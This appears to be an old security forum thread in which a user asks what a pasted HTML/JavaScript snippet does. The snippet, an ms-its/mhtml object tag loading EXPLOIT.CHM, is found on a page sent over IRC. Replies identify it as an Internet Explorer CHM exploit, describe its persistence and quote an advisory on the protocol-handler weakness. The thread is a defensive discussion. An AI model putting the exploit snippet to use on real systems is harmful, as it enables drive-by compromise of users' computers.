Results 1 to 5 of 5

Thread: What will this code do?

  1. #1
    Senior Member Falcon21's Avatar
    Join Date
    Dec 2002
    Location
    Singapore
    Posts
    252

    What will this code do?

    I am on mIRC and someone send a notice with a url. So I grab the source of the page using a tool and found this:

    <textarea id="code" style="display:none;">
    <object data="ms-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm" type="text/x-scriptlet"></object>
    </textarea>

    <script language="javascript">
    document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf('exploit.htm'))));
    </script>

    What does this do? Is there a patch for this?

  2. #2
    Senior Member
    Join Date
    Jan 2002
    Posts
    1,207
    What it will do depends on the contents of exploit.chm

    Slarty

  3. #3
    Senior Member Falcon21's Avatar
    Join Date
    Dec 2002
    Location
    Singapore
    Posts
    252
    If I visit this site, what files will be created and where?

  4. #4
    Senior Member
    Join Date
    Jul 2003
    Posts
    634
    A chm is a windows helpfile, that is some code for the chm exploit on IE, its annoying as anything, my friend had it and its very very difficult to remove, theres work arounds like the one detailed in my second link, but its annoying none the less, on my friends computer it set its self up as the start page and no matter how much you delete the file it always re-appears on boot up,

    The below link lists some stuff about the exploit, the other link shows a work around.

    http://www.securitytracker.com/alert...c/1008578.html
    http://netsecurity.about.com/cs/gene...a/aa021504.htm

    im not aware of a patch, although the best patch is probably not to use IE, and change to something like mozilla, im sure it doesnt affect Moz, but i could be incorrect in my assumption.

    i2c

  5. #5
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,885
    Yeah, there is another thread here discussing this same issue.

    http://www.antionline.com/showthread...hreadid=257718

    The long and short of the thread can be seen here:

    http://www.securityfocus.com/archive/1/363202

    Description:

    While previous patches were to stop showhelp from executing CHM files
    using their path, a weakness in the way the double "\" is handled by
    the its protocol handler allows for the execution of locally installed
    CHM files.when "\\" is placed before the name of target CHM file the
    HELP folder is searched for such name , if the help folder dose not
    contain a file with that name then the rootdrive would be the next
    path to be searched,when a file with that name is found in either of
    these paths it would be executed .
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •